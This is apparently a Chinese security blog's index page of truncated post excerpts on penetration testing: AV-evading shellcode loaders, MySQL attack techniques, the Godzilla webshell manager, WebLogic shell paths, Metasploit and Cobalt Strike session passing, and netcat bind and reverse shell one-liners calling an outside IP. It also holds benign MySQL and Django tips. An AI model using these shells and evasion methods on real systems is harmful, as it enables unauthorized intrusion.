51工具盒子
新鲜出炉免杀ShellcodeLoader
使用效果 在动态加载方式勾选反沙箱之后,结果如下: 
渗透利用mysql总结
前言 === 今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。 一、sqlshell获取 ============ 要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。 1、弱口令 这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也写过一个。要是运气...
哥斯拉Godzilla shell管理工具
前言 === 今年hw有点牛批,昨天爆出一堆0day,冰蝎也出了3.0,今天又看到一个哥斯拉,听说比冰蝎还nb(安全性自测,会不会是蓝队放出来的0_0) 哥斯拉优点 ===== * 1哥斯拉全部类型的shell均过市面所有静态查杀(特征随便改改就能继续过) * 2哥斯拉流量加密过市面全部流量waf * 3哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的(看了一下确实香) 项...
记weblogic上传shell路径
前言 === weblogic最近又出境了,小记一波。 路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...
metasploit与Cobaltstrike互相派生转化shell
前言 === 一般大家都是两款神器结合使用,自然少不了shell之间转换。 msf转cs ====== 首先cs创建一个windows/becon_http/reverse_http的 Listener 再用msf弹shell过去 msf exploit(handler) > use exploit/windows/local/payload_i...
mysql数据库优化
MySQL优化 ======= \*\*1. \*\* \*\*避免使用 select \* \*\* 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢 **2.** \*\*当你只需要查询出一条数据的时候,要使用 limit 1 \*\* 比如你要查询数据中是否有男生,只要查询一条含有男生的记录就行了,后面不需要再查了,使用Limit 1 可以在找到一条数...
Django使用已有创建过的mysql数据表
前言 === 因工作需要学习了一下django。特此记录 mysql表映射 ======== 在项目的根目录下执行下面的命令将mysql表映射到django的models中 python manage.py inspectdb > models.py 覆盖models ======== 然后将生成models.py文件覆盖掉站点app中的models....
小记mysql拿webshell的几种方法
前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...
记执行shell脚本出现^M不存在或者行尾多出%0D的问题
前言 === 刚刚用windows写了个脚本,拿到kali执行发现的问题(还是太垃圾了) 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式:CR LF unix格式:LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式
简单使用nc反弹shell
使用 === 正向shell: nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell: nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...
